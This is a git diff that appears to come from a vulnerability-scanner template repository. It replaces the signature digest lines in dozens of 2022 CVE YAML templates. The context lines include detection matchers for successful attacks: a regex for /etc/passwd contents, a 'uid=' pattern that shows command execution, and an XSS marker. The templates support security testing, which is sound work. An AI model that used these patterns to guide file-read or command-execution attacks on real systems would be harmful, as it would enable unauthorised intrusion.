4b0a00483046022100845419d44065b50c37fab39b1e683dedf38eefee4f0faa02533e4113e7f778be0221009201523b6d6927684f96818d2ee156378a5622630cff3802a54c0c9bba20daa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 990cc6514d..31149b221d 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7f00c85b2fc013d012ffbc1aface3dba29af2e1702bddfc66c8cbcdc3352788022100f55effaa808713faa5ad79ed9524db463132d5e31bdde0eba82aeaf965d12818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008358efa98f1659a8acdfdf875cbdf57539d9af5fd3afa08aad0f78d94a19647e022100fedb225932f440ffe47bfa9c175726d6fe7851f5dcc285b125280eb8c4785c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 692efb5b87..ccdc23581a 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d82b266b0760fde1b26ab005ed128cfe7c783b52db28f94bc666c9d03bb196002210098ccdcab8e372c1dd43317407e690f228e8cb1bc1c8add5c95870ceb805b2713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index d2afd30ad4..aac718e87b 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a6133499f5d377e9c10cce1deaaa1b80217ec22156f69d6175a9b958321a8d502210085ca957af87670643c6aed09bf0156a4c37519c0b98b77050dcbca0b85e8b814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdd94dee1919cc8d6393b4c5b93877f86f1e3902db9224e1f60452181ed7cd0d02205c5bf1988230e6bedb3df553df98e9159911c2e33c23c6cfb719f22c24c4c678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index 5637fd770c..aff68e65ae 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004b941fe0c29e3e5d82693bdb719e8d8bf0d20abade4a23f07f9a6f83c96c49e02201aeae2d265a2fa845153049b513dbfcbef5d317b1d289064871fdd40cc17f5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093892776ac58ed3cff91e703bb80e1bf1161e8fea7a074829798365aa59f1bff022012199730a0afc1aa13db3aa5858c749a852f4408a16607c8900e828578f2abe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index ed663ceefd..75b2455996 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Extension Options")' - 'contains(body_2, "&tab")' condition: and -# digest: 4b0a00483046022100dd995de30ddd471912eccf3b1c9747f357455709c02fff57a2ae72242063cfb6022100cf266425327b75e1aa894d7acfd50ae332dcda54311cd37251e9aecaed629c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026587a83402b1749f4184e74887cbdb11b76fa3babfbaaca23f485f832acfb1c0221009d0bab1fee3284c96da02ba80b50f6a6bf4451f2d11720563477e861357c7123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index e7b76c15b0..ec0a19e4d3 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea967c58be9ee6e85f2d1b08d1ee67741217d6aaf46a182af695e818b7a6f87b02206f095eaf60a0bcbafd8ab25b1a9895a5e83c2e0373e6663abffa5bd72148c22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 038cde1a2b..dd5e534d12 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c00ba6d3cd5e3419f477ba4f1c6636a9a6527a59b9c3b11b6947953d18b99fff022100b6882779caab224e10ac09ce3d14a50090914c62c5248a1f2cc556ba1c3cb21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204beecdbcc5ba3242e3e6bc99461018a43b5570894e3dc4b82e2a50797986c16602203a02e7e47f3caa501d526ad0e4e35674e451f3790695f645ad78b82d1a9a7e83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index ee5bcbd447..2157353306 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -77,4 +77,4 @@ http: regex: - "dt:'(.*?)',cu:" internal: true -# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f20e7567adf3a56f95951ba59eb8535745343dcae3fae71ac2a2db83fb1286ee02206508ef63e55e81530039cf11f1390490f01ed9e7ea2b69daa05e9c88c0550ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 48df8a1532..fd4bce5deb 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -61,4 +61,4 @@ http: - "status_code == 200" - "contains(body_1, 'index')" condition: and -# digest: 4a0a00473045022100eddd73199d20d259afa36f518385d2c6a5599db2a684123eb18b7465e35fadc702206d28ba1a993f628e7c45c6a2d82068bfb3c9c72e11e0ca8201a4ef233da38969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c70996a4a8c38a88dc646bf740938b97bf24325e79666a7d1393068ca7ed8940220587f2c2d6f95043be60b8517a39e886248d1cd5fac6b0c403d6d3ed4b9ffb925:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 0ead5380fd..447decc05c 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -55,4 +55,4 @@ http: - type: regex regex: - "root:[x*]:0:0" -# digest: 4a0a0047304502204c76827983086116cc5105ff1864cbc06f821b5e018567ec977226dbf0a96123022100a99892b0c629088eeb4bd82f6815df89a5d0460b742da6fd5e24924e1a44cca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f43fc6e5b13f0b620358143cd5c2ff407fbc6cb26341d0dbe5c90554ffa83cdb02205188ff403319366f2a4a75f3fa868ac2c1f22242edea24886fc92e7538df16cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 47cefc2342..e58b7b62ab 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -74,4 +74,4 @@ http: group: 1 regex: - 'uid=.*\(([a-z]+)\):' -# digest: 4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c31ea7cf01b41bb3cf4831dc223219a13abe7c716e184cce211cdca3c37cf4e80221009c6def3de8f68c0ac8ccbab72192a11fb9cd5946f13b784d7d0c78d82695b96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 252a79d46f..8ffb2f30a9 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ab7914b9539f109141d9e54dbb45670f383a8e97df145ac9bf53aa249da1310022100fa01474f7d8f45f1c0ca0ed2c7a156e755f044800755d6f932f68461e2a43b46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index dd4d1fcfa6..b1e6ede97a 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -74,4 +74,4 @@ http: regex: - "(.*?)" internal: true -# digest: 4a0a00473045022053679076bc7557501e02d91d43aef620a97ae250150ec9582e38ba855f404c6c022100c8428d2b76fa3b6dc76a6218b76fe10761ac009d56feb84be0cddc2a9f54cfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100959083cf9c14ebab619f9f72c4d74ac9c80d618d8d704aa0db0f6ddeb03dc79e022100dfb2e831eb99a1fbce5f67994458b466862f7455bd32ddfd0d478c31345f258c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index cf8c6b4dbf..6df92ce710 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2cd2b4b36c12ef855afc0cac09f36298010e442c61426eca62f5ea6e4315962022100913b98754a234e3457d7bcdb2a792c9d97477e636725d895925d9a5970fdb45a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 54adc8e270..1ef5966e7a 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and -# digest: 4b0a00483046022100bd925a5d0628000976660fe729e42a7f314f002bfb6407b82e26f1b090b62a4d022100b482d42c6c8674fb3ced86981e2df21831b145496f590b50dec1531c3d60d471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f00ac1820f09dc2f52690a5b9e6749ef92e22a4164b6ef2b0e03033c158ac180220057e3a7b9782376145eaccd82f65f8f15e2e8984e22e30e6eb164e83739a90b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 75f4a12690..655d78afdb 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 307 -# digest: 490a0046304402200b9d41c0309ab333bc791e17f4889c4b508a20ade256857de387596a939fb4c902200510b2369cd933fdeb6f527cf54398cb913417dac88699d63249c20b88272874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203db449eb727a41b07d0e582621f7bf8311d223d978e2b1d42479c60493d3167602200669b920b812088dd3d6b6fb44cda73538b0d5adad8f3ed5be7064c405231aee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 83dd277a75..e04c5c458d 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b466d037adefaeb908fdb770e3a8c773b544a35e01cedbcc3d21ec482597445022100a852a81f01da7a5b8a26be44d2bbc941e3a1cc06e619f94fcc22ff1066d18e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 70954f8e2c..2568e62f01 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220198f27be524ccad8572426583afc7404f4eadb4ee97c8673dfcc45c69474e4cc02205db8821d527e95ccb104e194cba4ad01b37bd10b23d007f2b2b49dd6dbc40b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbccb7770e584f307e973153aef2413de086a622bfdc9f2d7d75ffcdcc560f04022100c2426ac89b16016df32ade6f0ece4162582fb001bc8204b7d5e59d8a9a9b83f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 53d563fb1d..751c6e1847 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220218bdc2e0fa378e5ffcd162a69c37028a479680c6861d157c617c6d36fbfd5c4022100b7706b7c27cb0c75ea4ba4d4ecd5c5e5ee3e3d2712bad1e76dd7985fa47ca574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 6b1238c9e3..47d6eecaa3 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed779a9f9687940b2962eb1cb81f498633c303dafce9c65a87715c7441bba2302202d18e5e190defccdc3cd1e37a554cbd556bac428d069591d6ebf5e90df3e8ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071fdb30dda1300c3e29520bafb640b6b446614f18c0ac21624e34c1dce2907c8022100b3e7889b0ab672263e4f677ec1cb3ae13d72bacc8e4a18172d1f636e9597ca5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 5953bb409d..beec3bb0bf 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed31baef3a743912069b65ba5acc47646dcaf490915517bdd8e0e7ad7000e63002201f52667a811d396e971bdb076b9e20faf5f2855da5529fd33c7f57c62aca15cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fcc61d97e45a24d1ba74a9e55262ae16608c317bd73c0a8af941946c2dedde202207a94d89889634d23f327197f984ab320b5b0fbaa5548393e88d780983082c9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 3b0ea2c9ea..706f6a28c1 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200caed94f4b8e27ec84172f90ed66d6e4f8f48d0ef7a5a0a357277508b5a72bc90220296289a75e6d6fb85d9dc169017500c3b5068b79554b112583909bab61961620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index b626b3b4e7..77603026e6 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -71,4 +71,4 @@ http: regex: - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' internal: true -# digest: 4a0a0047304502202102f0fca3b27948107e82e0f1edb665eef04e734cb8223f72f8610fd0a77db7022100f66594372604dbb07eac6b1f2e2eaa0d92054b7cf0f0179d3f3b2278a84506fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5fa11e07228baa851dfaa62aa39232ffa643fb0afb07d45b9896a821d672e9b02210089f9b35148f6eca98dfcb05a554b8116051cb414fd910f34a5e97dfef3c06658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index f2ae4ce67f..f2443e7cdc 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f76032d2bd41c6495a1860289244da3d82b38e08f0a848eb2518c5cd1da7700022100a1576d48ab95c0498cb797b6a0b47ba69036a19a7f60a940ef5af91db82e3648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 05ca9d4cce..995836d282 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -53,4 +53,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and -# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008e6fc96139321b63c219be01deaba3cdcb5162125388950a7f6deb6ea2a880c022100e7f5d8a99f9197d292b76c18f45930d939eb1b884a19e6e1c1830d3773d84081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 49ca77dcfc..8a39da1959 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -86,4 +86,4 @@ http: regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true -# digest: 4a0a0047304502202048dbf451944c332d32cdf8e3e5afbd0760aad3b5c7ca8c8c9f5b8dc67c72c4022100cc0a5e2454e13a1a291ddb35096375206887fdc27eabed9aa389628c9cf910d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099fe2d391846a963b4a42e265f17285cd13e4453d388b83e971708525ba76393022100fe66b5447b1a2519e955e905fcbce32ef8cf6ae8c8171ed98e944af9f2fd34fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 31b4fed0e4..a720a454db 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c791685793b8fb80abb043da7ae5f3710b1d65a1b3d9faa3ccf50495fe31d8c0220231ab3489ab8f6663a3af33c508d38391bbcdd97105dbe2e568b4f354d138d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index d1bfdc403d..2d8c4e0e5b 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e48f19893d9a16ba855d6f9730af410be8edc4eab9b16ef74fe2b8efe0053ec70220188c3998530c97f55e5c698dfd34fd5a9db1a22759017498b1d094525c774be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecf4d28cfa4d8e9acc7e30ed93c9a855b4ac47d0b0677e40a403af6b77ccbbaa02201c2965ab840d94e84d219352549c7bee2fa56db29dd22b4969220785e523a706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index c284284b0f..bb3bc7db63 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099aa294bb03eed7043659c0199250e623d100e601d57357d3553dc6fd561d7e1022100bad06d4676647348c828a779719ab60d9b7cfd97baa3c3c4d1903c935eb92c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index fe13730e16..1763b4379e 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206895f96e250c4be91711ed2cac3a327d92e20fbf215981d8c9000883a7cb4d4a022100eb905135cf53e657c56d9445973982611b1df000a17e82e05f063125d1b16422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 6876fc8541..efebcce6f1 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -45,4 +45,4 @@ http: - "contains(location, 'login.php')" - 'contains(content_type, "text/html")' condition: and -# digest: 4a0a0047304502205adf6288fe87134b556d34fbfea1ed592c7a42950b76ddfbb3c75d90cba774e7022100b0c41e62a09fa680a12f1210778fe7bf97dab393091e9727779d941a9f3a2056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d47bc70d11884729580f9172f27de7d226ef1abff961e2a9e8246e8252674068022100830090a0cd000b966340e2f0446c6b90c0d05bf9b5bbabcfe8fefe29e1bd24c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 33e6312cce..04a2881288 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -61,4 +61,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and -# digest: 4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f417f9c6a9bc8988c5824b6075056008b654161a9396aff002ffca2e4bcce43022100a52a836cdaa54785747fbf37a4038560dc03ed7658de60a2e3b3df96f364c0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 21577707d9..39b11f9c55 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 301 -# digest: 4b0a00483046022100fded3edccd5f1179bdb2580cb9d18c97d3dab9ced013e1e822c48bd48ccfb195022100b207d6a21963237237bf2129669404f2fb7e5100b1ae87859f861bbac456db4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c524864438d26d3d4ec6a9fcdaac0a17f02193253ace57360911457dc1e1e3a9022100cc37241f61c4ba472282c4bf699ea37914b87f71bd093f14bc47ffc5a182f16c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 3217751e6f..945d8d35a3 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -83,4 +83,4 @@ http: regex: - 'type="hidden" value="(.*?)">' internal: true -# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebe83b1242fcb8fe11714df6a287cde525554d92a497b22f7ede7908f4fb5cfb02205a1ddf89bd0b1863b1447050811ac7aef2af7efbc667369f3aa7964e666ebbbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 7303890d0d..b478fb995a 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -67,4 +67,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d7851e48c4e4378d873ca3cb418e5f219d743c9e435e418b019e2ad5406d8ac022100a67ef8c0944a86563491b84687b0802d41eaf9aa23d6983ba84adcd92001651d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 7917c1968a..ab421f05e9 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and -# digest: 4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 